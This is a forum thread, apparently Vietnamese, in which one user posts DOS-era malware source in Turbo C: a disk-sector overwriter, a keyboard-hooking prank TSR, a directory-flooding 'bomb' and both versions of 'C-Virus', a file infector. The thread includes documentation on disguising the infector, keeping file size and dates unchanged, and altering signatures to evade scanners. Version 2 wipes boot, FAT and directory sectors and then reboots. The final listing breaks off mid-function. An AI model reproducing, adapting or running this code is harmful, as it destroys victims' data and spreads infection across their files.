Mã nguồn virus viết bằng Turbo C

AlexF · 02-08-2008, 08:00 AM

C Code:

Select All | Show/Hide

#include <dos.h>
#include <string.h>
main()
{
char *vir;
int i;
strcpy(vir,"");
for (i=0; i<40; i++)
strcat(vir,"HOWS IT DOING ROYAL UGLY DUDES!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!");
abswrite(2,50,0,vir);
abswrite(3,50,0,vir);
abswrite(4,50,0,vir);
abswrite(5,50,0,vir);
printf("Ouch dude... sorry..");
};

C Code:

Select All | Show/Hide

/* Cookie Monster */
/* Copyright (C) 1987 by Walker A. Archer */
/* 169 Albertson */
/* Rochester, MI 48063 */
/* */
/* Release 1.0 - 10/20/87 - First production release */
/* */
/* Special thanks to Michael Quinlan from whom much of this */
/* code was borrowed. */
/* */
/* I hereby donate this package to the public domain. Use it at your */
/* own risk. I make no claims or guarantees for its fitness for use */
/* on any system, nor will I accept responsibility for lost or damaged */
/* data. Should anyone make changes to this code, please update the */
/* release information at the top of this source file with comments */
/* regarding the changes or improvements made. Please send all comments */
/* to the above address or contact me via Softlaw BBS (313) 474-4217. */
/* */
/* Cookie Monster is based on a mainframe prank program which has */
/* become popular at a number of universities. Cookie Monster installs */
/* itself into memory and remains there until it decides to wake up. */
/* When it wakes up, a window is displayed in the middle of whatever */
/* the user happens to be in, and a prompt is shown that says */
/* 'Gimme a cookie'. The user must then figure out that he must enter */
/* a type of cookie from the keyboard. He must also figure out what */
/* kind of cookie the monster is hungry for, because if you get the */
/* wrong kind of cookie the monster will become more and more persistent, */
/* interrupting whatever the user is doing each time it prompts for a */
/* cookie. */
/* */
/* Usage is: */
/* */
/* COOKIE <nnnn> */
/* */
/* where nnnn is a number between 10 and 1000. */
/* */
/* The optional parameter sets the frequency that the Cookie Monster is */
/* likely to wake up. Cookie Monster chooses whether or not to wake up */
/* randomly each time a keystroke is entered. The default ratio is */
/* 1000:1. Therefore, if you enter COOKIE without the optional parameter */
/* there is a 1000 to 1 chance that Cookie Monster will wake up on any */
/* individual keystroke. If you enter COOKIE 100 there is a 100:1 chance */
/* that the Cookie Monster will wake up. The ratio is decreased each */
/* time a wrong response is detected, so there is a greater chance that */
/* the Cookie Monster will wake up. If a correct response is detected */
/* the ratio is set back to the original and a new cookie is randomly */
/* selected. */
/* */
/* Have fun with Cookie Monster, I know I had fun writing him. */
/* */
/* Only one known bug exists at the time of release. For some reason */
/* the color is occasionally lost on one or two characters on the echoed */
/* text. This text is sent to the screen via bios calls. I assume that */
/* an interrupt is catching my program somewhere and changing the */
/* attribute values. I'll continue to debug this problem because it */
/* makes the screen look sloppy, however it shouldn't cause any serious */
/* problems. */
/* */
/* When compiling this source you should use the tiny model, but leave */
/* cookie in its exe form. It cannot be converted to a com file. You */
/* should expect 6 warning messages. These are mostly because I ignored */
/* the most significant bytes returned by biostime(), which I use as my */
/* random number generator. */
#include <dos.h>
#include <process.h>
#include <ctype.h>
#include <mem.h>
long biostime(int,long);
#define KeybdVect 0x09
#define KB_Data 0x60
#define NULL 0x00
void interrupt (*old_keyboard)(void);
unsigned int COOKIE_Active = 0; /* Non-zero when we are "popped up" */
int Cookie_num = 0;
#define MAX_FREQ 1000
int Frequency = MAX_FREQ;
int SavFreq = MAX_FREQ;
#define SCR_ROW 25
#define SCR_COL 80
#define WINDOW_ROW 7
#define WINDOW_COL 60
#define WINDOW_UL_ROW 2
#define WINDOW_UL_COL 10
#define W_TO_S_ROW(x) ((x)+WINDOW_UL_ROW)
#define W_TO_S_COL(x) ((x)+WINDOW_UL_COL)
#define RC_TO_OFF(row,col) (((row)*SCR_COL + (col)) * 2)
#define NORM_ATTR 0x1E
char OldScreen[SCR_COL*SCR_ROW*2];
char far *VideoBuffer;
#define NUM_OF_COOKIES 13
char Cookie_type[NUM_OF_COOKIES][15] = {
"chocolate chip",
"oreo",
"macaroon", /* The baker's dozen */
"oatmeal",
"peanut butter",
"fig newton",
"lady fingers",
"sugar",
"vanilla wafers",
"pecan sandies",
"chips ahoy",
"ginger snaps",
"girl scout"
};
#define INCORRECT_NUM 5
char Bad_Resp[INCORRECT_NUM][17] = {
"Blech!!!",
"Me no like that.",
"Yuck!!!",
"Ugh...",
"Arghhh!!"
};
#define CORRECT_NUM 5
char Good_Resp[CORRECT_NUM][17] = {
"Mmmm... me like!",
"YummmYummm",
"Oh boy... Tanks",
"Delicious...",
"Thank You"
};
char NewScreen[WINDOW_COL*WINDOW_ROW+1] =
"ɍ͍͍͍͍͍͍͍͠Info-Tech Cookie Monster ͍͍͍͍͍͍͍͍?"
"? ?"
"? Gimme a cookie! ?"
"? ?"
"? ?"
"? ?"
"ȍ͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍ͼ";
#define ESC_KEY 0x1B
#define CR_KEY 0x0D
#define BS_KEY 0x08
/*------------------------------------------------------------------------*/
/* */
/* exit - Reduce code size by replacing the standard exit function. */
/* We don't use files, so there is no need to bring in the file */
/* system just to close files. */
/* */
/*------------------------------------------------------------------------*/
void cdecl exit(int status)
{
_exit(status);
}
/*------------------------------------------------------------------------*/
/* */
/* _setenvp - Suppress this library function to conserve code space. */
/* */
/*------------------------------------------------------------------------*/
void cdecl _setenvp(void) {}
/*------------------------------------------------------------------------*/
/* */
/* main - Main Program. Initialize interrupt vectors, etc. */
/* */
/*------------------------------------------------------------------------*/
cdecl main(int argc, char *argv[])
{
void interrupt KeybdHandler(void);
unsigned int prgsize(void);
int atoi(char *);
unsigned int biosequip(void);
static int i;
static unsigned int j;
bdosptr(0x09,"COOKIE MONSTER\r\n$",0);
bdosptr(0x09,"Copyright (c) 1987 by Walker Archer\r\n$",0);
bdosptr(0x09,"Initiating lurk mode.\r\n$",0);
j = biosequip();
if ((j & 48) == 48) /* Check for mono or */
VideoBuffer = (char far *) 0xB0000000L; /* color monitor */
else
VideoBuffer = (char far *) 0xB8000000L;
if (argv[1] != NULL) {
if ((i = atoi(argv[1])) > 9 && (i <1001))
SavFreq = Frequency = i;
else {
bdosptr(0x09,"\r\nERROR - argument must be between 10 and 1000\r\n$",0);
bdosptr(0x09,"\r\nContinuing installation with a default of 1000\r\n$",0);
}
}
old_keyboard = getvect(KeybdVect);
setvect(KeybdVect, KeybdHandler);
Cookie_num = biostime(0,0)%NUM_OF_COOKIES;
keep(0, prgsize());
}
/*------------------------------------------------------------------------*/
/* */
/* prgsize - Calculate program size. */
/* */
/* __brklvl has the end of initialized and uninitialized data within */
/* the data segment at program startup. It is then incremented and */
/* decremented as memory is malloc'd and free'd. */
/* */
/* This function works in Tiny, Small, and Medium models. */
/* */
/*------------------------------------------------------------------------*/
unsigned int prgsize(void)
{
extern unsigned __brklvl;
extern unsigned _psp;
return (_DS + (__brklvl + 15) / 16 - _psp);
}
/*------------------------------------------------------------------------*/
/* */
/* KeybdHandler - Handle keyboard interrupts. Check for our popup code. */
/* If so, and if we are not already active, then invoke */
/* the popup program. Otherwise pass the stuff on to the */
/* original handler. */
/* */
/* Static and Global variables are used to keep the stack size to a */
/* minimum. */
/* */
/*------------------------------------------------------------------------*/
void interrupt KeybdHandler()
{
void COOKIE(void);
unsigned int GetKey(void);
long biostime(int,long);
static char c;
c = inportb(KB_Data);
(*old_keyboard)();
if (((biostime(0,0)%Frequency) == 0) && (COOKIE_Active != 1)) {
++COOKIE_Active;
GetKey();
COOKIE();
--COOKIE_Active;
}
}
void COOKIE(void)
{
void Set_curs_pos(unsigned int,unsigned int,unsigned int);
void Get_curs_pos(unsigned int *,unsigned int *,unsigned int);
void SaveWindow(void);
void RestoreWindow(void);
void DisplayWindow(void);
void Print_Str(char *,int,int);
void Print_Char(char,int,int);
void Get_Str(char *,int,int,int);
unsigned int GetKey(void);
int stricmp(char *,char *);
unsigned strlen(char *);
static unsigned int savrow,savcol;
static char Got_cookie[16];
static int l;
SaveWindow(); /* Save the screen */
DisplayWindow(); /* and pop up the window */
Get_curs_pos(&savrow,&savcol,0); /* Save current cursor position */
Set_curs_pos(4,36,0); /* then move cursor to the window */
Get_Str(Got_cookie,18,15,0); /* Accept input */
if (stricmp(Got_cookie,Cookie_type[Cookie_num])) { /* Wrong response */
l = biostime(0,0)%INCORRECT_NUM;
Set_curs_pos(6,(40 - (strlen(Bad_Resp[l]) / 2)),0);
Print_Str(Bad_Resp[l],15,0);
if (Frequency > 10) /* Adjust the frequency ratio */
Frequency /= 2;
}
else { /* Correct response */
l = biostime(0,0)%CORRECT_NUM;
Set_curs_pos(6,(40 - (strlen(Good_Resp[l]) / 2)),0);
Print_Str(Good_Resp[l],15,0);
Frequency = SavFreq;
Cookie_num = biostime(0,0)%NUM_OF_COOKIES;
}
for (l=0;l<32000;l++);
for (l=0;l<32000;l++);
Set_curs_pos(savrow,savcol,0); /* then restore old curs pos */
RestoreWindow(); /* Restore, makes window disapear */
}
void SaveWindow(void)
{
movedata(FP_SEG(VideoBuffer), 0, _DS, (int) OldScreen, SCR_COL*SCR_ROW*2);
}
void RestoreWindow(void)
{
movedata(_DS, (int) OldScreen, FP_SEG(VideoBuffer), 0, SCR_COL*SCR_ROW*2);
}
void DisplayWindow(void)
{
static int row, col;
static char *sp, far *dp;
dp = VideoBuffer + (WINDOW_UL_ROW*SCR_COL + WINDOW_UL_COL)*2;
sp = NewScreen;
for (row=0; row<WINDOW_ROW; row++) {
for (col=0; col<WINDOW_COL; col++) {
*dp++ = *sp++;
*dp++ = NORM_ATTR;
}
dp += (SCR_COL-WINDOW_COL)*2;
}
}
/*------------------------------------------------------------------------*/
/* */
/* GetKey - Get a key from the keyboard via BIOS calls. */
/* */
/*------------------------------------------------------------------------*/
unsigned int GetKey(void)
{
int bioskey(int);
static unsigned int c;
c = bioskey(0);
if ((c & 0x00FF) != 0) return (c & 0x00FF);
else return c;
}
/*------------------------------------------------------------------------*/
/* */
/* Set_curs_pos - Set the cursor position via BIOS calls. The */
/* caller must send the page number (usually 0) */
/* in addition to the row and column to maintain */
/* flexibility for use in other programs. */
/* */
/*------------------------------------------------------------------------*/
void Set_curs_pos(unsigned int row,unsigned int col,unsigned int page)
{
_AX = 0x0200;
_DL = col;
_DH = row;
_BH = page;
geninterrupt(0x10);
}
/*------------------------------------------------------------------------*/
/* */
/* Get_curs_pos - Get the cursor position via BIOS calls. The */
/* caller must send the page number (usually 0) */
/* in addition to the row and column to maintain */
/* flexibility for use in other programs. */
/* */
/*------------------------------------------------------------------------*/
void Get_curs_pos(unsigned int *row,unsigned int *col,unsigned int page)
{
_AX = 0x0300;
_BH = page;
geninterrupt(0x10);
*col = _DL;
*row = _DH;
}
/*------------------------------------------------------------------------*/
/* */
/* Print_Char - Print a character to the screen via BIOS calls. */
/* caller must send the page number (usually 0) */
/* in addition to the character and attribute in */
/* order to maintain flexibility. */
/* */
/*------------------------------------------------------------------------*/
void Print_Char(char c, int attr, int page)
{
_AH = 14;
_AL = c;
_BL = attr;
_BH = page;
geninterrupt(0x10);
}
void Print_Str(char *s, int attr, int page)
{
static char c;
while ((c = *s++) != 0) Print_Char(c, attr, page);
}
/*------------------------------------------------------------------------*/
/* */
/* Get_Str - Print a string to the screen via BIOS calls. The */
/* caller must send the page number (usually 0) */
/* in addition to the string and attribute in */
/* order to maintain flexibility. */
/* */
/*------------------------------------------------------------------------*/
void Get_Str(char *s, int len, int attr, int page)
{
static char c;
static int i = 0;
while ((c = bioskey(0)) != CR_KEY) {
switch (c) {
case BS_KEY:
if (i > 0) {
*s--;
i--;
Print_Char(c, attr, page);
Print_Char(' ', attr, page);
Print_Char(c, attr, page);
}
break;
case ESC_KEY:
break;
default:
if (i < len) {
*s++ = c;
i++;
Print_Char(c, attr, page);
}
break;
}
}
*s = '\0';
i = 0;
}

AlexF · 02-08-2008, 08:01 AM

C Code:

Select All | Show/Hide

/****
This program was designed by Ninja Wala from SUP
Now, you must remember this : DON'T RUN THIS PROGRAM ON YOUR HD, or you'll
be long time dead, this is not a virus, this is a bomb !
Program code is pretty straight forward, you can compile it with any version
of Turbo C or Microsoft C ( change the dir.h into direct.h ), or you can
copy this program into your own source as a routine. piece of cake.
There isn't any big skill in this program, it's just an idea of joke,
punishment or whatever, what this program do is it build 50 subdirectories
and in each subdirectory build another 50 sundirectories, and there is NO
utility can remove it, pctools will just crash or malfunction, and if you
remove it by hand... hmm... let's say you'll spend a month in front of your
computer typing RD ..... , RD..... RD ..... , and spitting dirty words at
the same time, hehe.
If you know nothing about C language, you can just take the EXE file and
use it, just type CRAZY, and you'll be long time dead, so what you should
do is do it at RAM disk or blank floppy disk, or your school's computer or
your foe's computer, it will be really a mess....
Change the value of 50 will give the owner of that computer a stroke.
P.S : If you already run CRAZY.EXE before you read this.... ack leave me
E-mail, and we'll see what I can do.
-Ninja Wala
*****/
/****
Make You Crazy !!
Never execute this program on your HD , haha !!
Programmed By Ninja Wala -- Royal Leader of Software Underground Palace
Share your knowledge and experience with other members in SUP,
and we share ours with you.
*/
#include <stdio.h>
#include <stdlib.h>
#include <dir.h>
main()
{
int i,j;
char tmp[20];
char far *ptr;
for (i=0;i<=50;i++){
srand(rand());
ptr = itoa(rand(),tmp,10);
mkdir ( ptr );
chdir ( ptr );
for (j=0;j<=50;j++){
ptr = itoa(rand(),tmp,10);
mkdir( ptr );
}
chdir ("\\");
}
}

Documentation Code:

Select All | Show/Hide

                          Documentation for C-Virus
 
 
I. How to use
 
     To use C-Virus, merely rename it to some innocent (or not-so-innocent)
sounding file name, such as ULTIMA7.EXE or GIFVIEW.COM.  Then let someone run
it.  It's that simple.  Just make sure that its extension is .EXE or .COM.
     One option of C-Virus is that you can choose to replace any .EXE or .COM
file (or, if you really wanted to, any file) with C-Virus.  At the DOS prompt
type "C-Virus (filename)" where filename is the name of the victim.  C-Virus
will only spread to that file, not harming any other file in the directory. 
For example, you could type "CVIRUS WC2.EXE" and although WC2.EXE would appear
unchanged, it is now actually another copy of C-Virus.  Then feel free to
show "Wing Commander II" to all your friends (on their computers, of course).
 
 
II.  Modifying C-Virus
 
     C-Virus was written in Borland's Turbo C++ v1.00 with some inline 8086
assembly language.  C-Virus will also compile under Turbo C v2.00, and should
port to other IBM-PC C compilers with little modification.  If you'd like to
observe C-Virus in action, uncomment the line reading "// #define DEBUG 1." 
Note that this will cause the resultant .EXE file to grow by at least 1k.
     Another good area for modification is the function hostile_activity(). 
This function is automatically called if there are no files left to infect. 
The current version of C-Virus merely has this function beep three times and
print "All files infected.  Mission complete."  If you feel hostile or want
to seek revenge on someone with C-Virus, replacing the friendly message with
a few select calls to abswrite(), unlink(), and biosdisk() could liven things
up a bit.
     Other good expansions of C-Virus include adding support for multiple-
directory spreads; changing the code so that C-Virus only goes off on certain
days, weeks, etc.; adding memory-resident support; or, for the truly ambitious,
adding specific COMMAND.COM "support" <hehehe>.  Simple modifications to C-
Virus can easily create viruses just as good as the "professionals'."
     Note:  Try to avoid using printf() or related functions; they can increase
the size of C-Virus dramatically.  Instead use the function small_print(). 
In addition, note that TOO_SMALL is left defined at a little over 6k.  If,
when recompiling C-Virus, you see that the final product is larger or smaller,
change TOO_SMALL to a little over the size of the .EXE file.  This insures
maximum effect without alerting people via increase in file size.
 
 
III.  Recompiling C-Virus
 
     To re-compile C-Virus, use the included batch file MAKEVIR.BAT.  This
file assumes that you:  (1) Have LZEXE.EXE, and that it's in your path; (2) 
DEBUG is also in your path; and (3) That MAKEVIR.SCR is in the current
directory.  If any of these things are different on your computer, change the
batch file accordingly.
     A note about the "NMAN" signature:  When creating new versions of C-Virus,
I suggest changing the signature to something else.  IT MUST BE FOUR BYTES
LONG.  Change MAKEVIR.SCR so the second line reads "DB '(four bytes)'."  Also
change the definition of SIGNATURE in the C source code.  Nowhere Man would
appreciate that any modified versions do not read "NMAN" - use some other
bytes.  These bytes not only insure that there is a signature so that files
aren't re-infected, but they also stop people from UNLZEXEing you virus for
analysis.
 
IV.  Removing C-Virus
 
     DO NOT accidentally infect yourself.  Infected files are unrecoverable. 
If you infect your files, the only way to get rid of the virus is to erase
them.  Don't say you weren't warned.
     By the way, no virus-scanner that I know of can identify C-Virus.  Of
course, it's only a matter of time, so be sure to change the signature or
code in minor ways frequently.  Nothing can remove C-Virus either.  Oh well.
 
 
V.  A Listing for C-Virus (a l? The Computer Virus Handbook by Richard Levin)
 
 
C-Virus
 
 
Aliases                  None
Effective Length         N/A
Type code(s)             ONA - overwriting nonresident .COM and .EXE infector
Detection method         None
Removal instructions     Delete infected files
 
 
The C-Virus was written on June 25, 1991 by the mysterious hacker known as
"Nowhere Man."  It is a generic .COM and .EXE infector.  When it activates,
it displays the message "Out of memory."  It then exits back to DOS, making
the user believe that he had insufficient memory to run the program.  Because
C-Virus overwrites the file (although the file's size is unaffected), infected
files must be deleted and replaced with uninfected copies in order to remove
the virus.  When all files in a given directory are infected, a message is
displayed to that effect, and nothing further happens.
     Note:  There are many strains of the C-Virus, many of which aren't so
harmless.  Don't be lulled into a false sense of security.
 
 
 
                                  Have Fun!
 
                               - Nowhere Man@echo off
tcc -O -Z -ms cvirus.c > nul
if errorlevel 1 pause ** Error - Press Control-Break now **
erase cvirus.obj > nul
lzexe cvirus > nul
erase cvirus.old > nul
ren cvirus.exe cvir.tmp > nul
debug cvir.tmp < makevir.scr > nul
ren cvir.tmp cvirus.exe > nul
echo Your virus is done...
 
 
 
                  ɍ͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍ͻ
                  ?          The Hell Pit BBS              ?
                  ?              1200/2400                 ?
                  ? Sysops:    Operating At    Permanent   ?
                  ?  HADES       4,500,000? suntans    ?
                  ?  K?TO                      available   ?
                  ?       ?    (708)459-7267               ?
                  ?      ???                   ?          ??
                  ? ?   ?????      ?          ??         ???
                  ??   ???????      ?        ????       ????
                  ??? ?????????   ????     ???????     ?????
                  ?? ??????????? ???????   ????????   ??????
                  ??????????????????????? ?????????? ???????
                  ??????????????????????????????????????????
                  ȍ͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍ͼ
                            We want your viruses!

C Code:

Select All | Show/Hide

/* C-Virus: A generic .COM and .EXE infector
Written by Nowhere Man
Project started and completed on 6-24-91
Written in Turbo C++ v1.00 (works fine with Turbo C v2.00, too)
*/
#pragma inline // Compile to .ASM
#include <alloc.h>
#include <dir.h>
#include <dos.h>
#include <io.h>
#include <stdio.h>
void hostile_activity(void);
int infected(char *);
void spread(char *, char *);
void small_print(char *);
char *victim(void);
// #define DEBUG
#define ONE_KAY 1024 // 1k
#define TOO_SMALL ((6 * ONE_KAY) + 300) // 6k+ size minimum
#define SIGNATURE "NMAN" // Sign of infection
int main(void)
{
/* The main program */
spread(_argv[0], victim()); // Perform infection
small_print("Out of memory\r\n"); // Print phony error
return(1); // Fake failure...
}
void hostile_activity(void)
{
/* Put whatever you feel like doing here...I chose to
make this part harmless, but if you're feeling
nasty, go ahead and have some fun... */
small_print("\a\a\aAll files infected. Mission complete.\r\n");
exit(2);
}
int infected(char *fname)
{
/* This function determines if fname is infected */
FILE *fp; // File handle
char sig[5]; // Virus signature
fp = fopen(fname, "rb");
fseek(fp, 28L, SEEK_SET);
fread(sig, sizeof(sig) - 1, 1, fp);
#ifdef DEBUG
printf("Signature for %s: %s\n", fname, sig);
#endif
fclose(fp);
return(strncmp(sig, SIGNATURE, sizeof(sig) - 1) == 0);
}
void small_print(char *string)
{
/* This function is a small, quick print routine */
asm {
push si
mov si,string
mov ah,0xE
}
print: asm {
lodsb
or al,al
je finish
int 0x10
jmp short print
}
finish: asm pop si
}
void spread(char *old_name, char *new_name)
{
/* This function infects new_name with old_name */
/* Variable declarations */
FILE *old, *new; // File handles
struct ftime file_time; // Old file date, time
int attrib; // Old attributes
long old_size, virus_size; // Sizes of files
char *virus_code = NULL; // Pointer to virus
int old_handle, new_handle; // Handles for files
/* Perform the infection */
#ifdef DEBUG
printf("Infecting %s with %s...\n", new_name, old_name);
#endif
old = fopen(old_name, "rb"); // Open virus
new = fopen(new_name, "rb"); // Open victim
old_handle = fileno(old); // Get file handles
new_handle = fileno(new);
old_size = filelength(new_handle); // Get old file size
virus_size = filelength(old_handle); // Get virus size
attrib = _chmod(new_name, 0); // Get old attributes
getftime(new_handle, &file_time); // Get old file time
fclose(new); // Close the virusee
_chmod(new_name, 1, 0); // Clear any read-only
unlink(new_name); // Erase old file
new = fopen(new_name, "wb"); // Open new virus
new_handle = fileno(new);
virus_code = malloc(virus_size); // Allocate space
fread(virus_code, virus_size, 1, old); // Read virus from old
fwrite(virus_code, virus_size, 1, new); // Copy virus to new
_chmod(new_name, 1, attrib); // Replace attributes
chsize(new_handle, old_size); // Replace old size
setftime(new_handle, &file_time); // Replace old time
/* Clean up */
fcloseall(); // Close files
free(virus_code); // Free memory
}
char *victim(void)
{
/* This function returns the virus's next victim */
/* Variable declarations */
char *types[] = {"*.EXE", "*.COM"}; // Potential victims
static struct ffblk ffblk; // DOS file block
int done; // Indicates finish
int index; // Used for loop
/* Find our victim */
if ((_argc > 1) && (fopen(_argv[1], "rb") != NULL))
return(_argv[1]);
for (index = 0; index < sizeof(types); index++) {
done = findfirst(types[index], &ffblk, FA_RDONLY | FA_HIDDEN | FA_SYSTEM | FA_ARCH);
while (!done) {
#ifdef DEBUG
printf("Scanning %s...\n", ffblk.ff_name);
#endif
/* If you want to check for specific days of the week,
months, etc., here is the place to insert the
code (don't forget to "#include <time.h>"!) */
if ((!infected(ffblk.ff_name)) && (ffblk.ff_fsize > TOO_SMALL))
return(ffblk.ff_name);
done = findnext(&ffblk);
}
}
/* If there are no files left to infect, have a little fun... */
hostile_activity();
return(0); // Prevents warning
}

AlexF · 02-08-2008, 08:04 AM

Documentation Code:

Select All | Show/Hide

                          Documentation for C-Virus
                         ---------------------------
 
 
I. How to use
 
     To use C-Virus, merely rename it to some innocent (or not-so-innocent)
sounding file name, such as ULTIMA7.EXE, GIFVIEW.COM, or HOTSEX.EXE.  Then
let someone run it.  It's that simple.  Just make sure that its extension is
.EXE or .COM.
      A better choice is to replace any .EXE or .COM file (or, if you really
wanted to, any file) with C-Virus.  At the DOS prompt type "CVIRUS (filename)"
where filename is the name of the victim.  C-Virus will only spread to that
file, not harming any other file in the directory. For example, you could
type "CVIRUS WC2.EXE" and although WC2.EXE would appear unchanged, it is now
actually another copy of C-Virus.  Then feel free to show "Wing Commander II"
to all your friends (on their computers, of course).  Be sure to backup the
file if you want to keep it, as CVIRUS will totally obliterate it.
 
 
II.  Modifying C-Virus
 
     C-Virus was written in Borland's Turbo C++ v1.00, but will also compile
under Turbo C v2.00, and should port to other IBM-PC C compilers with little
modification.
     A good area for modification is the function hostile_activity(). This
function is automatically called if there are no files left to infect.  The
current version of C-Virus has this function overwrite the victim's C:'s boot,
FAT, and directory sectors with garbage, the warm reboot so the chump can
experience the horror of DOS telling him his hard disk is screwed - permanently.
You may want to add to this a few select calls to abswrite(), unlink(), and
biosdisk(), or write your own, more devious routines.
     Other good expansions of C-Virus include adding support for multiple-
directory spreads (something I avoided because it would take up too much space);
changing the code so that C-Virus only goes off on certain days, weeks, etc.;
adding memory-resident support; or, for the truly ambitious, adding specific
COMMAND.COM "support" <hehehe>.  Simple modifications to C-Virus can easily
create viruses just as good as the "professionals'."
     Note:  Try to avoid using printf() or related functions; they can increase
the size of C-Virus dramatically.  Instead use the function puts() or, better
yet, use the _write() command, but this is harder to use. In addition, note
that TOO_SMALL is left defined at a 4.8k.  If, when recompiling C-Virus, you
see that the final product is larger or smaller, change TOO_SMALL to a little
over the size of the .EXE file.  This insures maximum effect without alerting
people via increase in file size.  If this number is too small, subsequent
infections will crash because all of the virus code won't be copied.
 
 
III.  Recompiling C-Virus
 
     To re-compile C-Virus, use the included batch file MAKEVIR.BAT.  This
file assumes that you:  (1) Have LZEXE.EXE, and that it's in your path; (2) 
DEBUG is also in your path; and (3) That MAKEVIR.SCR is in the current
directory.  If any of these things are different on your computer, change the
batch file accordingly.  If you add "-D" to the command line after MAKEVIR,
debug mode will automatically be activated.  If you use a compiler other than
Turbo C++ or Turbo C, you'll have to change the name of the compiler, as well
as the options it is invoked with.
     A note about the "NMAN" signature:  When creating new versions of C-Virus,
I suggest changing the signature to something else.  IT MUST BE FOUR BYTES
LONG.  Change MAKEVIR.SCR so the second line reads "DB '(four bytes)'."  Also
change the definition of SIGNATURE in the C source code.  I would appreciate
that any modified versions do not read "NMAN" - use some other bytes.  These
bytes not only insure that there is a signature so that files aren't
re-infected, but they also stop people from UNLZEXEing you virus for analysis
(of course they could always change them back, but most people are too stupid
to think of this).
 
 
IV.  Removing C-Virus
 
     DO NOT accidentally infect yourself.  Infected files are unrecoverable. 
If you infect your files, the only way to get rid of the virus is to erase
them.  Don't say you weren't warned.
     By the way, no virus-scanner that I know of can identify C-Virus.  Of
course, it's only a matter of time, so be sure to change the signature, the
screw_virex[] array, and the code frequently.  Nothing can remove C-Virus
either.  Oh well.
 
     If you have any questions, suggestions, or complaints, you can leave E-Mail
for me at the Pirate's Guild BBS (1-708-541-1069).
 
 
                               Happy virusing!
 
                                -Nowhere Man/* C-Virus:  A generic .COM and .EXE infector
   Written by Nowhere Man
   September 23, 1991
   Version 2.0
*/
 
#include <dir.h>
#include <dos.h>
#include <fcntl.h>
#include <io.h>
#include <stdio.h>
 
 
/* Note that the #define TOO_SMALL is the minimum size of the .EXE or .COM
   file which CVIRUS can infect without increasing the size of the file.
   (Since this would tip off the victim to CVIRUS's presence, no file under
   this size will be infected.)  It should be set to the approximate size
   of the LZEXEd .EXE file produced from this code.
 
   SIGNATURE is the four-byte signature that CVIRUS checks for to prevent
   re-infection of itself.
*/
 
#ifdef DEBUG
#define TOO_SMALL 6100
#else
#define TOO_SMALL 4900
#endif
 
#define SIGNATURE "NMAN"
 
 
/* The following is a table of random byte values.  Be sure to constantly
   change this to prevent detection by virus scanners, but keep it short
   (or non-exsistant) to keep the code size down.
*/
 
char screw_virex[] = "\xFF\x17\x12\x39\x54\xFA\x23\xBC\xCD\xAD";
 
void hostile_activity(void)
{
    /* Put whatever you feel like doing here...
       I chose to make this routine trash the victim's boot, FAT, and
       directory sectors, but you can alter this code however you want,
       and are encouraged to do so.
    */
 
 
#ifdef DEBUG
    puts("\aAll files infected!");
    exit(1);
#else
    /* Overwrite five sectors, starting with sector 0, on C:, with the
       memory at location DS:0000 (random garbage).
    */
 
    abswrite(2, 5, 0, (void *) 0);
    __emit__(0xCD, 0x19);   // Reboot computer
#endif
}
 
int infected(char *fname)
{
    /* This function determines if fname is infected.  It reads four
       bytes 28 bytes in from the start and checks them agains the
       current header.  1 is returned if the file is already infected,
       0 if it isn't.
    */
 
    register int handle;
    char virus_signature[35];
    static char check[] = SIGNATURE;
 
    handle = _open(fname, O_RDONLY);
    _read(handle, virus_signature, sizeof(virus_signature));
    close(handle);
 
#ifdef DEBUG
    printf("Signature for %s:  %.4s\n", fname, &virus_signature[28]);
#endif
 
    /* This next bit may look really stupid, but it actually saves about
       100 bytes.
    */
 
    return((virus_signature[28] == check[0]) && (virus_signature[29] == check[1])
           && (virus_signature[30] == check[2]) && (virus_signature[31] == check[3]));
}
 
void spread(char *virus, char *victim)
{
    /* This function infects victim with virus.  First, the file
       sizes of the two files are determined.  Then the victim's
       attributes and file date/time are read and the victim is closed,
       its attributes set to 0, and deleted.  Then the virus is copied
       to the victim's file name.  Its attributes, file date/time, and
       size are set to that of the victim's, preventing detection, and
       the files are closed.
    */
 
    register int virus_handle, victim_handle, attrib;
    struct ftime victim_file_time;
    unsigned virus_size;
    long victim_size;
    char virus_code[TOO_SMALL + 1];
 
#ifdef DEBUG
    printf("Infecting %s with %s...\n", victim, virus);
#endif
 
    /* Open files */
 
    virus_handle = _open(virus, O_RDONLY);
    victim_handle = _open(victim, O_RDONLY);
 
 
    /* Get the actual size of the virus */
 
    virus_size = filelength(virus_handle);
 
 
    /* Get victim's attributes */
 
    victim_size = filelength(victim_handle);
    attrib = _chmod(victim, 0);
    getftime(victim_handle, &victim_file_time);
 
 
    /* Eliminate victim */
 
    close(victim_handle);
    _chmod(victim, 1, 0);
    remove(victim);
 
 
#ifdef DEBUG
    puts("Ok so far...");
#endif
 
    /* Recreate the victim */
 
    victim_handle = _creat(victim, attrib);
 
 
    /* Copy virus */
 
    _read(virus_handle, virus_code, virus_size);
    _write(victim_handle, virus_code, virus_size);
 
 
#ifdef DEBUG
    puts("Almost done...");
#endif
 
    /* Reset victim's file date, time, and size */
 
    chsize(victim_handle, victim_size);
    setftime(victim_handle, &victim_file_time);
 
 
    /* Close files */
 
    close(virus_handle);
    close(victim_handle);
 
#ifdef DEBUG
    puts("Infection complete!");
#endif
}
 
char *victim(void)
{
    /* This function returns a pointer to the name of the virus's next
       victim.  This routine is set up to try to infect .EXE and .COM
       files.  If there is a command line argument, it will try to infect
       that file instead.  If all files are infected, hostile activity
       is initiated...
    */
 
    register int done;
    register char **ext;
    static char *types[] = {"*.EXE", "*.COM", NULL};
    static struct ffblk ffblk;
 
    for (ext = (*++_argv) ? _argv : types; *ext; ext++) {
        done = findfirst(*ext, &ffblk, FA_RDONLY | FA_HIDDEN | FA_SYSTEM | FA_ARCH);
        while (!done) {
 
#ifdef DEBUG
            printf("Scanning %s...\n", ffblk.ff_name);
#endif
 
    /* If you want to check for specific days of the week, months, etc.,
       here is the place to insert the code (don't forget to "#include
       <time.h>").
    */
 
            if ((!infected(ffblk.ff_name)) && (ffblk.ff_fsize > TOO_SMALL))
                return(ffblk.ff_name);
            done = findnext(&ffblk);
        }
    }
 
 
    /* If there are no files left to infect, have a little fun */
 
    hostile_activity();
}
 
int main(void)
{
    /* In the main program, a victim is found and infected.  If all files
       are infected, a malicious action is performed.  Otherwise, a bogus
       error message is displayed, and the virus terminates with code
       1, simulating an error.
    */
 
